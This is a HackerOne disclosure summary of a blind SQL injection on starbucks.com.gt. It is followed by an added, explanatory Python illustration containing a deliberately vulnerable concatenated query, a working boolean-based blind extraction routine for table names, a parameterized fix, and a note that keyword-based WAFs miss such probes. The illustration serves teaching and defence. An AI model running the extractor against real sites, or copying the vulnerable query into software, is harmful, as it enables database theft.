Starbucks: Blind SQL Injection on starbucks.com.gt and WAF Bypass

2019-04-27T15:23:27
ID H1:549355
Type hackerone
Reporter d3417_
Modified 2019-06-19T16:55:24

Description

Starting with a blind SQL Injection on http://www.starbucks.com.gt/menu/beverage/detail, @d3417_ was able to dump the schema of several database tables. The report was initially closed as N/A because of our exclusion of automated tools, then reopened to investigate the data reported in the tables, and because the casual use of an sqlmap command doesn't meet our usual definition of an automated scan. It was downgraded from Critical to High and awarded a $500 bounty because of the limited nature of the data exposed in these tables. Disclosure was requested, but since much of the ticket would need to be redacted in order to remove database/table/schema/field names, we're releasing the summary and timeline only. Thanks to @d3417_ for reporting this.
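The summary says only that a blind SQL injection on the beverage detail page was enough to dump table schemas. The following is an added illustration, written for this page and not taken from the report or from Starbucks' code, of what that means mechanically: a hypothetical `detail()` lookup that concatenates its `id` into SQL leaks one bit per request (item found or not), and a boolean-based oracle turns that bit into the first table name from `sqlite_master` one character at a time. The in-memory SQLite database, the `beverage` table, and the `id` parameter are all constructed for the example; the real endpoint's backend, parameters and payloads are not on this page. The parameterized version of the same lookup is shown beside it so the fix is visible.

```python
import sqlite3


def make_db():
    """Constructed stand-in for a menu database (not the real site's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE beverage (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO beverage VALUES (1, 'latte'), (2, 'mocha')")
    return conn


def detail_vulnerable(conn, item_id):
    """Hypothetical detail lookup that splices user input straight into SQL.
    Returns only whether a row was found: that single bit is the blind oracle."""
    sql = f"SELECT name FROM beverage WHERE id = {item_id}"
    return conn.execute(sql).fetchone() is not None


def detail_fixed(conn, item_id):
    """Same lookup with a bound parameter; the input is data, never SQL text."""
    row = conn.execute("SELECT name FROM beverage WHERE id = ?", (item_id,)).fetchone()
    return row is not None


def blind_extract_table_name(oracle, max_len=32):
    """Boolean-based blind extraction of the first table name in sqlite_master.

    `oracle(payload)` must return True when the injected condition holds.
    Each character is recovered by binary search over printable ASCII (32..126),
    so the cost is about 7 requests per character plus one length probe."""
    subq = "(SELECT name FROM sqlite_master WHERE type='table' LIMIT 1)"
    name = ""
    for pos in range(1, max_len + 1):
        # Stop once the string has no character at this position.
        if not oracle(f"1 AND length({subq}) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1 AND unicode(substr({subq},{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        name += chr(lo)
    return name


if __name__ == "__main__":
    db = make_db()
    # Against the concatenating lookup the oracle leaks the table name.
    print(blind_extract_table_name(lambda p: detail_vulnerable(db, p)))  # beverage
    # Against the parameterized lookup every probe is just a non-matching id.
    print(repr(blind_extract_table_name(lambda p: detail_fixed(db, p))))  # ''
```

The same oracle shape is what a tool like sqlmap automates at scale; a WAF that only looks for obvious keywords in the request will not see anything unusual in a sequence of `length(...) >= N` and `unicode(substr(...)) > N` comparisons, which is why the durable fix is the bound parameter in `detail_fixed`, not request filtering.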